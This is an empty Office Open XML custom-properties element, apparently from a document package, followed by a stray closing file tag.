<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>